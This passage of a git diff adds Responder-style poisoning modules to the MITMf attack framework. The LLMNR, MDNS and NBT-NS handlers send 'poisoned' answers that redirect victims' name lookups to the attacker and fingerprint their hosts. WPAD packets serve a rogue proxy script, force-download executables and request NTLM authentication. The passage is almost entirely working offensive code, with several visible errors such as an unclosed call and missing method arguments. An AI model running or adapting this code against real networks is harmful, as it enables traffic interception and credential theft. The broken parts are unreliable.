("pidhigh", "\x00\x00"), + ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"), + ("reserved", "\x00\x00"), + ("tid", "\x00\x00"), + ("pid", "\xff\xfe"), + ("uid", "\x00\x00"), + ("mid", "\x00\x00"), + ]) + +#SMB Negotiate Answer packet. +class SMBNegoAns(Packet): + fields = OrderedDict([ + ("Wordcount", "\x11"), + ("Dialect", ""), + ("Securitymode", "\x03"), + ("MaxMpx", "\x32\x00"), + ("MaxVc", "\x01\x00"), + ("Maxbuffsize", "\x04\x11\x00\x00"), + ("Maxrawbuff", "\x00\x00\x01\x00"), + ("Sessionkey", "\x00\x00\x00\x00"), + ("Capabilities", "\xfd\x43\x00\x00"), + ("Systemtime", "\xc2\x74\xf2\x53\x70\x02\xcf\x01\x2c\x01"), + ("Keylength", "\x08"), + ("Bcc", "\x10\x00"), + ("Key", "\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d"), + ("Domain", ""), + + ]) + + def calculate(self): + + ##Then calculate. 
+ CompleteBCCLen = str(self.fields["Key"])+str(self.fields["Domain"]) + self.fields["Bcc"] = struct.pack(" {}".format(OURIP)) + server = ThreadingUDPLLMNRServer(("0.0.0.0", 5355), LLMNR) + t = threading.Thread(name="LLMNR", target=server.serve_forever) #LLMNR + t.setDaemon(True) + t.start() + except Exception, e: + mitmf_logger.error("[LLMNRPoisoner] Error starting on port {}: {}:".format(5355, e)) + +class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer): + + allow_reuse_address = 1 + + def server_bind(self): + MADDR = "224.0.0.252" + self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1) + self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255) + Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,socket.inet_aton(MADDR) + socket.inet_aton(OURIP)) + + UDPServer.server_bind(self) + +#LLMNR Answer packet. +class LLMNRAns(Packet): + fields = OrderedDict([ + ("Tid", ""), + ("Flags", "\x80\x00"), + ("Question", "\x00\x01"), + ("AnswerRRS", "\x00\x01"), + ("AuthorityRRS", "\x00\x00"), + ("AdditionalRRS", "\x00\x00"), + ("QuestionNameLen", "\x09"), + ("QuestionName", ""), + ("QuestionNameNull", "\x00"), + ("Type", "\x00\x01"), + ("Class", "\x00\x01"), + ("AnswerNameLen", "\x09"), + ("AnswerName", ""), + ("AnswerNameNull", "\x00"), + ("Type1", "\x00\x01"), + ("Class1", "\x00\x01"), + ("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec. + ("IPLen", "\x00\x04"), + ("IP", "\x00\x00\x00\x00"), + ]) + + def calculate(self): + self.fields["IP"] = socket.inet_aton(OURIP) + self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"])) + self.fields["AnswerNameLen"] = struct.pack(">h",len(self.fields["AnswerName"]))[1] + self.fields["QuestionNameLen"] = struct.pack(">h",len(self.fields["QuestionName"]))[1] + +def Parse_LLMNR_Name(data): + NameLen = struct.unpack('>B',data[12])[0] + Name = data[13:13+NameLen] + return Name + +# LLMNR Server class. 
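The overridden server_bind() above is what makes the LLMNR poisoner see traffic at all: clients multicast their name lookups to 224.0.0.252 on UDP/5355, so the listening socket has to join that group on the local interface. A minimal standalone receiver performing the same join (local_ip is a placeholder for the framework's OURIP value):

```python
import socket

local_ip = "192.168.1.10"   # placeholder for OURIP, the interface address MITMf is using

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("0.0.0.0", 5355))

# Join the LLMNR multicast group on the chosen interface, mirroring the
# IP_ADD_MEMBERSHIP call in server_bind() above.
mreq = socket.inet_aton("224.0.0.252") + socket.inet_aton(local_ip)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)

data, addr = sock.recvfrom(1024)    # blocks until a client multicasts a name lookup
print("query from %s:%d (%d bytes)" % (addr[0], addr[1], len(data)))
```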
+class LLMNR(BaseRequestHandler): + + def handle(self): + + ResponderConfig = ConfigWatcher.getInstance().getConfig()['Responder'] + DontRespondTo = ResponderConfig['DontRespondTo'] + DontRespondToName = ResponderConfig['DontRespondToName'] + RespondTo = ResponderConfig['RespondTo'] + RespondToName = ResponderConfig['RespondToName'] + + data, soc = self.request + try: + if data[2:4] == "\x00\x00": + if Parse_IPV6_Addr(data): + Name = Parse_LLMNR_Name(data) + if args.analyze: + if args.finger: + try: + Finger = RunSmbFinger((self.client_address[0],445)) + mitmf_logger.warning("[LLMNRPoisoner] {} is looking for {} | OS: {} | Client Version: {}".format(self.client_address[0], Name,Finger[0],Finger[1])) + except Exception: + mitmf_logger.warning("[LLMNRPoisoner] {} is looking for {}".format(self.client_address[0], Name)) + else: + mitmf_logger.warning("[LLMNRPoisoner] {} is looking for {}".format(self.client_address[0], Name)) + + if DontRespondToSpecificHost(DontRespondTo): + if RespondToIPScope(DontRespondTo, self.client_address[0]): + return None + + if DontRespondToSpecificName(DontRespondToName) and DontRespondToNameScope(DontRespondToName.upper(), Name.upper()): + return None + + if RespondToSpecificHost(RespondTo): + if args.analyze == False: + if RespondToIPScope(RespondTo, self.client_address[0]): + if RespondToSpecificName(RespondToName) == False: + buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name) + buff.calculate() + for x in range(1): + soc.sendto(str(buff), self.client_address) + #mitmf_logger.info(Message) + mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was : {}".format(self.client_address[0],Name)) + if args.finger: + try: + Finger = RunSmbFinger((self.client_address[0],445)) + #print '[LLMNRPoisoner] OsVersion is:%s'%(Finger[0]) + #print '[LLMNRPoisoner] ClientVersion is :%s'%(Finger[1]) + mitmf_logger.info('[LLMNRPoisoner] OsVersion is:{}'.format(Finger[0])) + mitmf_logger.info('[LLMNRPoisoner] ClientVersion is :{}'.format(Finger[1])) + except Exception: + mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0])) + pass + + if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()): + buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name) + buff.calculate() + for x in range(1): + soc.sendto(str(buff), self.client_address) + mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was : {}".format(self.client_address[0],Name)) + if args.finger: + try: + Finger = RunSmbFinger((self.client_address[0],445)) + #print '[LLMNRPoisoner] OsVersion is:%s'%(Finger[0]) + #print '[LLMNRPoisoner] ClientVersion is :%s'%(Finger[1]) + mitmf_logger.info('[LLMNRPoisoner] OsVersion is:{}'.format(Finger[0])) + mitmf_logger.info('[LLMNRPoisoner] ClientVersion is :{}'.format(Finger[1])) + except Exception: + mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0])) + pass + + if args.analyze == False and RespondToSpecificHost(RespondTo) == False: + if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()): + buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name) + buff.calculate() + for x in range(1): + soc.sendto(str(buff), self.client_address) + mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was : {}".format(self.client_address[0], Name)) + if args.finger: + try: + Finger = 
RunSmbFinger((self.client_address[0],445)) + #print '[LLMNRPoisoner] OsVersion is:%s'%(Finger[0]) + #print '[LLMNRPoisoner] ClientVersion is :%s'%(Finger[1]) + mitmf_logger.info('[LLMNRPoisoner] OsVersion is: {}'.format(Finger[0])) + mitmf_logger.info('[LLMNRPoisoner] ClientVersion is : {}'.format(Finger[1])) + except Exception: + mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0])) + pass + if RespondToSpecificName(RespondToName) == False: + buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name) + buff.calculate() + for x in range(1): + soc.sendto(str(buff), self.client_address) + mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was : {}".format(self.client_address[0], Name)) + if args.finger: + try: + Finger = RunSmbFinger((self.client_address[0],445)) + mitmf_logger.info('[LLMNRPoisoner] OsVersion is: {}'.format(Finger[0])) + mitmf_logger.info('[LLMNRPoisoner] ClientVersion is : {}'.format(Finger[1])) + except Exception: + mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0])) + pass + else: + pass + else: + pass + except: + raise \ No newline at end of file diff --git a/core/responder/llmnr/__init__.py b/core/responder/llmnr/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/responder/mdns/MDNSPoisoner.py b/core/responder/mdns/MDNSPoisoner.py new file mode 100644 index 0000000..e8bbb77 --- /dev/null +++ b/core/responder/mdns/MDNSPoisoner.py @@ -0,0 +1,103 @@ +#! /usr/bin/env python2.7 + +from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler +import threading +import struct + +from core.protocols.odict import OrderedDict +from core.protocols.packet import Packet + +class MDNSPoisoner(): + + def start(): + try: + server = ThreadingUDPMDNSServer(("0.0.0.0", 5353), MDNS) + t = threading.Thread(name="MDNS", target=server.serve_forever) + t.setDaemon(True) + t.start() + except Exception, e: + print "Error starting MDNSPoisoner on port %s: %s:" % (str(port),str(e)) + +class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer): + + allow_reuse_address = 1 + + def server_bind(self): + MADDR = "224.0.0.251" + self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1) + self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255) + Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,inet_aton(MADDR)+inet_aton(OURIP)) + + UDPServer.server_bind(self + +class MDNSAns(Packet): + fields = OrderedDict([ + ("Tid", "\x00\x00"), + ("Flags", "\x84\x00"), + ("Question", "\x00\x00"), + ("AnswerRRS", "\x00\x01"), + ("AuthorityRRS", "\x00\x00"), + ("AdditionalRRS", "\x00\x00"), + ("AnswerName", ""), + ("AnswerNameNull", "\x00"), + ("Type", "\x00\x01"), + ("Class", "\x00\x01"), + ("TTL", "\x00\x00\x00\x78"),##Poison for 2mn. 
+ ("IPLen", "\x00\x04"), + ("IP", "\x00\x00\x00\x00"), + ]) + + def calculate(self): + self.fields["IP"] = inet_aton(OURIP) + self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"])) + +def Parse_MDNS_Name(data): + data = data[12:] + NameLen = struct.unpack('>B',data[0])[0] + Name = data[1:1+NameLen] + NameLen_ = struct.unpack('>B',data[1+NameLen])[0] + Name_ = data[1+NameLen:1+NameLen+NameLen_+1] + return Name+'.'+Name_ + +def Poisoned_MDNS_Name(data): + data = data[12:] + Name = data[:len(data)-5] + return Name + +class MDNS(BaseRequestHandler): + + def handle(self): + MADDR = "224.0.0.251" + MPORT = 5353 + data, soc = self.request + if self.client_address[0] == "127.0.0.1": + pass + try: + if AnalyzeMode: + if Parse_IPV6_Addr(data): + #print '[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data)) + responder_logger.info('[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data))) + + if RespondToSpecificHost(RespondTo): + if AnalyzeMode == False: + if RespondToIPScope(RespondTo, self.client_address[0]): + if Parse_IPV6_Addr(data): + #print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)) + responder_logger.info('MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data))) + Name = Poisoned_MDNS_Name(data) + MDns = MDNSAns(AnswerName = Name) + MDns.calculate() + soc.sendto(str(MDns),(MADDR,MPORT)) + + if AnalyzeMode == False and RespondToSpecificHost(RespondTo) == False: + if Parse_IPV6_Addr(data): + #print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)) + responder_logger.info('MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data))) + Name = Poisoned_MDNS_Name(data) + MDns = MDNSAns(AnswerName = Name) + MDns.calculate() + soc.sendto(str(MDns),(MADDR,MPORT)) + else: + pass + except Exception: + raise \ No newline at end of file diff --git a/core/responder/mdns/__init.py b/core/responder/mdns/__init.py new file mode 100644 index 0000000..e69de29 diff --git a/core/responder/nbtns/NBTNSPoisoner.py b/core/responder/nbtns/NBTNSPoisoner.py new file mode 100644 index 0000000..1d4c071 --- /dev/null +++ b/core/responder/nbtns/NBTNSPoisoner.py @@ -0,0 +1,208 @@ +#! /usr/bin/env python2.7 + +from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler +import threading +import struct + +from core.responder.packet import Packet + +class NBTNSPoisoner(): + + def start(): + server = ThreadingUDPServer(("0.0.0.0", 137), NB) + t = threading.Thread(name="NBNS", target=server.serve_forever()) #NBNS + t.setDaemon(True) + t.start() + +class ThreadingUDPServer(ThreadingMixIn, UDPServer): + + allow_reuse_address = 1 + + def server_bind(self): + UDPServer.server_bind(self) + +#NBT-NS answer packet. 
+class NBT_Ans(Packet): + fields = OrderedDict([ + ("Tid", ""), + ("Flags", "\x85\x00"), + ("Question", "\x00\x00"), + ("AnswerRRS", "\x00\x01"), + ("AuthorityRRS", "\x00\x00"), + ("AdditionalRRS", "\x00\x00"), + ("NbtName", ""), + ("Type", "\x00\x20"), + ("Classy", "\x00\x01"), + ("TTL", "\x00\x00\x00\xa5"), + ("Len", "\x00\x06"), + ("Flags1", "\x00\x00"), + ("IP", "\x00\x00\x00\x00"), + ]) + + def calculate(self,data): + self.fields["Tid"] = data[0:2] + self.fields["NbtName"] = data[12:46] + self.fields["IP"] = inet_aton(OURIP) + +def NBT_NS_Role(data): + Role = { + "\x41\x41\x00":"Workstation/Redirector Service.", + "\x42\x4c\x00":"Domain Master Browser. This name is likely a domain controller or a homegroup.)", + "\x42\x4d\x00":"Domain controller service. This name is a domain controller.", + "\x42\x4e\x00":"Local Master Browser.", + "\x42\x4f\x00":"Browser Election Service.", + "\x43\x41\x00":"File Server Service.", + "\x41\x42\x00":"Browser Service.", + } + + if data in Role: + return Role[data] + else: + return "Service not known." + +# Define what are we answering to. +def Validate_NBT_NS(data,Wredirect): + if AnalyzeMode: + return False + + if NBT_NS_Role(data[43:46]) == "File Server Service.": + return True + + if NBTNSDomain == True: + if NBT_NS_Role(data[43:46]) == "Domain controller service. This name is a domain controller.": + return True + + if Wredirect == True: + if NBT_NS_Role(data[43:46]) == "Workstation/Redirector Service.": + return True + + else: + return False + +def Decode_Name(nbname): + #From http://code.google.com/p/dpkt/ with author's permission. + try: + if len(nbname) != 32: + return nbname + l = [] + for i in range(0, 32, 2): + l.append(chr(((ord(nbname[i]) - 0x41) << 4) | + ((ord(nbname[i+1]) - 0x41) & 0xf))) + return filter(lambda x: x in string.printable, ''.join(l).split('\x00', 1)[0].replace(' ', '')) + except: + return "Illegal NetBIOS name" + +# NBT_NS Server class. +class NB(BaseRequestHandler): + + def handle(self): + data, socket = self.request + Name = Decode_Name(data[13:45]) + + if DontRespondToSpecificHost(DontRespondTo): + if RespondToIPScope(DontRespondTo, self.client_address[0]): + return None + + if DontRespondToSpecificName(DontRespondToName) and DontRespondToNameScope(DontRespondToName.upper(), Name.upper()): + return None + + if AnalyzeMode: + if data[2:4] == "\x01\x10": + if Is_Finger_On(Finger_On_Off): + try: + Finger = RunSmbFinger((self.client_address[0],445)) + Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s.\nOs Version is: %s Client Version is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46]),Finger[0],Finger[1]) + logger3.warning(Message) + except Exception: + Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s\n"%(self.client_address[0], Name,NBT_NS_Role(data[43:46])) + logger3.warning(Message) + else: + Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46])) + logger3.warning(Message) + + if RespondToSpecificHost(RespondTo) and AnalyzeMode == False: + if RespondToIPScope(RespondTo, self.client_address[0]): + if data[2:4] == "\x01\x10": + if Validate_NBT_NS(data,Wredirect): + if RespondToSpecificName(RespondToName) == False: + buff = NBT_Ans() + buff.calculate(data) + for x in range(1): + socket.sendto(str(buff), self.client_address) + Message = 'NBT-NS Answer sent to: %s. 
The requested name was : %s'%(self.client_address[0], Name) + #responder_logger.info(Message) + logger2.warning(Message) + if Is_Finger_On(Finger_On_Off): + try: + Finger = RunSmbFinger((self.client_address[0],445)) + #print '[+] OsVersion is:%s'%(Finger[0]) + #print '[+] ClientVersion is :%s'%(Finger[1]) + responder_logger.info('[+] OsVersion is:%s'%(Finger[0])) + responder_logger.info('[+] ClientVersion is :%s'%(Finger[1])) + except Exception: + responder_logger.info('[+] Fingerprint failed for host: %s'%(self.client_address[0])) + pass + if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()): + buff = NBT_Ans() + buff.calculate(data) + for x in range(1): + socket.sendto(str(buff), self.client_address) + Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name) + #responder_logger.info(Message) + logger2.warning(Message) + if Is_Finger_On(Finger_On_Off): + try: + Finger = RunSmbFinger((self.client_address[0],445)) + #print '[+] OsVersion is:%s'%(Finger[0]) + #print '[+] ClientVersion is :%s'%(Finger[1]) + responder_logger.info('[+] OsVersion is:%s'%(Finger[0])) + responder_logger.info('[+] ClientVersion is :%s'%(Finger[1])) + except Exception: + responder_logger.info('[+] Fingerprint failed for host: %s'%(self.client_address[0])) + pass + else: + pass + else: + pass + + else: + if data[2:4] == "\x01\x10": + if Validate_NBT_NS(data,Wredirect) and AnalyzeMode == False: + if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()): + buff = NBT_Ans() + buff.calculate(data) + for x in range(1): + socket.sendto(str(buff), self.client_address) + Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name) + #responder_logger.info(Message) + logger2.warning(Message) + if Is_Finger_On(Finger_On_Off): + try: + Finger = RunSmbFinger((self.client_address[0],445)) + #print '[+] OsVersion is:%s'%(Finger[0]) + #print '[+] ClientVersion is :%s'%(Finger[1]) + responder_logger.info('[+] OsVersion is:%s'%(Finger[0])) + responder_logger.info('[+] ClientVersion is :%s'%(Finger[1])) + except Exception: + responder_logger.info('[+] Fingerprint failed for host: %s'%(self.client_address[0])) + pass + if RespondToSpecificName(RespondToName) == False: + buff = NBT_Ans() + buff.calculate(data) + for x in range(1): + socket.sendto(str(buff), self.client_address) + Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name) + #responder_logger.info(Message) + logger2.warning(Message) + if Is_Finger_On(Finger_On_Off): + try: + Finger = RunSmbFinger((self.client_address[0],445)) + #print '[+] OsVersion is:%s'%(Finger[0]) + #print '[+] ClientVersion is :%s'%(Finger[1]) + responder_logger.info('[+] OsVersion is:%s'%(Finger[0])) + responder_logger.info('[+] ClientVersion is :%s'%(Finger[1])) + except Exception: + responder_logger.info('[+] Fingerprint failed for host: %s'%(self.client_address[0])) + pass + else: + pass \ No newline at end of file diff --git a/core/responder/nbtns/__init__.py b/core/responder/nbtns/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/responder/odict.py b/core/responder/odict.py new file mode 100644 index 0000000..89a9172 --- /dev/null +++ b/core/responder/odict.py @@ -0,0 +1,120 @@ +# NBT-NS/LLMNR Responder +# Created by Laurent Gaffie +# Copyright (C) 2014 Trustwave Holdings, Inc. 
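Decode_Name() used by the NBT-NS handler above undoes the NetBIOS "first-level" encoding: the 16-byte, space-padded name is split into nibbles and each nibble is shifted into the letters 'A'..'P', which is why queries carry 32-character names. A round-trip sketch of that transform (the sample name is arbitrary, and the decoder keeps only the core of the original logic):

```python
def encode_name(name):
    # Space-pad to the 16-byte NetBIOS name length, then map each nibble to 'A'..'P'.
    out = []
    for c in name.ljust(16):
        out.append(chr((ord(c) >> 4) + 0x41))
        out.append(chr((ord(c) & 0x0f) + 0x41))
    return "".join(out)

def decode_name(nbname):
    # Recombine nibble pairs into bytes, as Decode_Name() does above.
    chars = []
    for i in range(0, 32, 2):
        chars.append(chr(((ord(nbname[i]) - 0x41) << 4) |
                         ((ord(nbname[i + 1]) - 0x41) & 0x0f)))
    return "".join(chars).split("\x00", 1)[0].strip()

encoded = encode_name("FILESERVER")
print(encoded)               # EGEJEMEFFDEFFCFGEFFCCACACACACACA
print(decode_name(encoded))  # FILESERVER
```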
+# +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . + + +#Packet class handling all packet generation (see odict.py). +from UserDict import DictMixin + +class OrderedDict(dict, DictMixin): + + def __init__(self, *args, **kwds): + if len(args) > 1: + raise TypeError('expected at most 1 arguments, got %d' % len(args)) + try: + self.__end + except AttributeError: + self.clear() + self.update(*args, **kwds) + + def clear(self): + self.__end = end = [] + end += [None, end, end] + self.__map = {} + dict.clear(self) + + def __setitem__(self, key, value): + if key not in self: + end = self.__end + curr = end[1] + curr[2] = end[1] = self.__map[key] = [key, curr, end] + dict.__setitem__(self, key, value) + + def __delitem__(self, key): + dict.__delitem__(self, key) + key, prev, next = self.__map.pop(key) + prev[2] = next + next[1] = prev + + def __iter__(self): + end = self.__end + curr = end[2] + while curr is not end: + yield curr[0] + curr = curr[2] + + def __reversed__(self): + end = self.__end + curr = end[1] + while curr is not end: + yield curr[0] + curr = curr[1] + + def popitem(self, last=True): + if not self: + raise KeyError('dictionary is empty') + if last: + key = reversed(self).next() + else: + key = iter(self).next() + value = self.pop(key) + return key, value + + def __reduce__(self): + items = [[k, self[k]] for k in self] + tmp = self.__map, self.__end + del self.__map, self.__end + inst_dict = vars(self).copy() + self.__map, self.__end = tmp + if inst_dict: + return (self.__class__, (items,), inst_dict) + return self.__class__, (items,) + + def keys(self): + return list(self) + + setdefault = DictMixin.setdefault + update = DictMixin.update + pop = DictMixin.pop + values = DictMixin.values + items = DictMixin.items + iterkeys = DictMixin.iterkeys + itervalues = DictMixin.itervalues + iteritems = DictMixin.iteritems + + def __repr__(self): + if not self: + return '%s()' % (self.__class__.__name__,) + return '%s(%r)' % (self.__class__.__name__, self.items()) + + def copy(self): + return self.__class__(self) + + @classmethod + def fromkeys(cls, iterable, value=None): + d = cls() + for key in iterable: + d[key] = value + return d + + def __eq__(self, other): + if isinstance(other, OrderedDict): + return len(self)==len(other) and \ + min(p==q for p, q in zip(self.items(), other.items())) + return dict.__eq__(self, other) + + def __ne__(self, other): + return not self == other diff --git a/core/responder/packet.py b/core/responder/packet.py new file mode 100644 index 0000000..ffdf157 --- /dev/null +++ b/core/responder/packet.py @@ -0,0 +1,34 @@ +# NBT-NS/LLMNR Responder +# Created by Laurent Gaffie +# Copyright (C) 2014 Trustwave Holdings, Inc. +# +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. 
+# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . + + +#Packet class handling all packet generation (see odict.py). +from odict import OrderedDict + +class Packet(): + fields = OrderedDict([ + ("data", ""), + ]) + def __init__(self, **kw): + self.fields = OrderedDict(self.__class__.fields) + for k,v in kw.items(): + if callable(v): + self.fields[k] = v(self.fields[k]) + else: + self.fields[k] = v + def __str__(self): + return "".join(map(str, self.fields.values())) diff --git a/core/responder/wpad/HTTPPackets.py b/core/responder/wpad/HTTPPackets.py new file mode 100644 index 0000000..92fe6ce --- /dev/null +++ b/core/responder/wpad/HTTPPackets.py @@ -0,0 +1,275 @@ +#! /usr/bin/env python +# NBT-NS/LLMNR Responder +# Created by Laurent Gaffie +# Copyright (C) 2014 Trustwave Holdings, Inc. +# +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . + +import struct + +from core.responder.packet import Packet +from core.responder.odict import OrderedDict +from base64 import b64decode,b64encode + +#WPAD script. the wpadwpadwpad is shorter than 15 chars and unlikely to be found. 
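The Packet class above (core/responder/packet.py) is the serialization backbone for every packet definition in this patch: a subclass declares an ordered field map, keyword arguments override individual fields (a callable override receives the current default and returns the new value), and str() concatenates the values into wire bytes. For reference, the same pattern with the stdlib OrderedDict, applied to the SMTP greeting defined earlier (class and variable names here are illustrative):

```python
from collections import OrderedDict

class Packet(object):
    fields = OrderedDict([("data", "")])

    def __init__(self, **kw):
        # Copy the class-level template so instances never share mutable state.
        self.fields = OrderedDict(self.__class__.fields)
        for k, v in kw.items():
            # A callable override receives the default value and returns the new one.
            self.fields[k] = v(self.fields[k]) if callable(v) else v

    def __str__(self):
        # The wire format is every field value concatenated in declaration order.
        return "".join(map(str, self.fields.values()))

class Greeting(Packet):
    fields = OrderedDict([
        ("Code", "220"),
        ("Separator", "\x20"),
        ("Message", "smtp01.local ESMTP"),
        ("CRLF", "\x0d\x0a"),
    ])

print(repr(str(Greeting())))                            # '220 smtp01.local ESMTP\r\n'
print(repr(str(Greeting(Message="mail.example.com"))))  # override a single field
```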
+class WPADScript(Packet): + fields = OrderedDict([ + ("Code", "HTTP/1.1 200 OK\r\n"), + ("ServerType", "Server: Microsoft-IIS/6.0\r\n"), + ("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"), + ("Type", "Content-Type: application/x-ns-proxy-autoconfig\r\n"), + ("PoweredBy", "X-Powered-By: ASP.NET\r\n"), + ("ContentLen", "Content-Length: "), + ("ActualLen", "76"), + ("CRLF", "\r\n\r\n"), + ("Payload", "function FindProxyForURL(url, host){return 'PROXY wpadwpadwpad:3141; DIRECT';}"), + ]) + def calculate(self): + self.fields["ActualLen"] = len(str(self.fields["Payload"])) + +class ServerExeFile(Packet): + fields = OrderedDict([ + ("Code", "HTTP/1.1 200 OK\r\n"), + ("ContentType", "Content-Type: application/octet-stream\r\n"), + ("LastModified", "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"), + ("AcceptRanges", "Accept-Ranges: bytes\r\n"), + ("Server", "Server: Microsoft-IIS/7.5\r\n"), + ("PoweredBy", "X-Powered-By: ASP.NET\r\n"), + ("ContentLen", "Content-Length: "), + ("ActualLen", "76"), + ("Date", "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"), + ("Connection", "Connection: keep-alive\r\n"), + ("X-CCC", "US\r\n"), + ("X-CID", "2\r\n"), + ("CRLF", "\r\n"), + ("Payload", "jj"), + ]) + def calculate(self): + self.fields["ActualLen"] = len(str(self.fields["Payload"])) + +class ServeAlwaysExeFile(Packet): + fields = OrderedDict([ + ("Code", "HTTP/1.1 200 OK\r\n"), + ("ContentType", "Content-Type: application/octet-stream\r\n"), + ("LastModified", "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"), + ("AcceptRanges", "Accept-Ranges: bytes\r\n"), + ("Server", "Server: Microsoft-IIS/7.5\r\n"), + ("PoweredBy", "X-Powered-By: ASP.NET\r\n"), + ("ContentDisp", "Content-Disposition: attachment; filename="), + ("ContentDiFile", ""), + ("FileCRLF", ";\r\n"), + ("ContentLen", "Content-Length: "), + ("ActualLen", "76"), + ("Date", "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"), + ("Connection", "Connection: keep-alive\r\n"), + ("X-CCC", "US\r\n"), + ("X-CID", "2\r\n"), + ("CRLF", "\r\n"), + ("Payload", "jj"), + ]) + def calculate(self): + self.fields["ActualLen"] = len(str(self.fields["Payload"])) + +class ServeAlwaysNormalFile(Packet): + fields = OrderedDict([ + ("Code", "HTTP/1.1 200 OK\r\n"), + ("ContentType", "Content-Type: text/html\r\n"), + ("LastModified", "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"), + ("AcceptRanges", "Accept-Ranges: bytes\r\n"), + ("Server", "Server: Microsoft-IIS/7.5\r\n"), + ("PoweredBy", "X-Powered-By: ASP.NET\r\n"), + ("ContentLen", "Content-Length: "), + ("ActualLen", "76"), + ("Date", "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"), + ("Connection", "Connection: keep-alive\r\n"), + ("X-CCC", "US\r\n"), + ("X-CID", "2\r\n"), + ("CRLF", "\r\n"), + ("Payload", "jj"), + ]) + def calculate(self): + self.fields["ActualLen"] = len(str(self.fields["Payload"])) + +#HTTP Packet used for further NTLM auth. +class IIS_Auth_407_Ans(Packet): + fields = OrderedDict([ + ("Code", "HTTP/1.1 407 Authentication Required\r\n"), + ("Via", "Via: 1.1 SMB-TOOLKIT\r\n"), + ("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"), + ("Type", 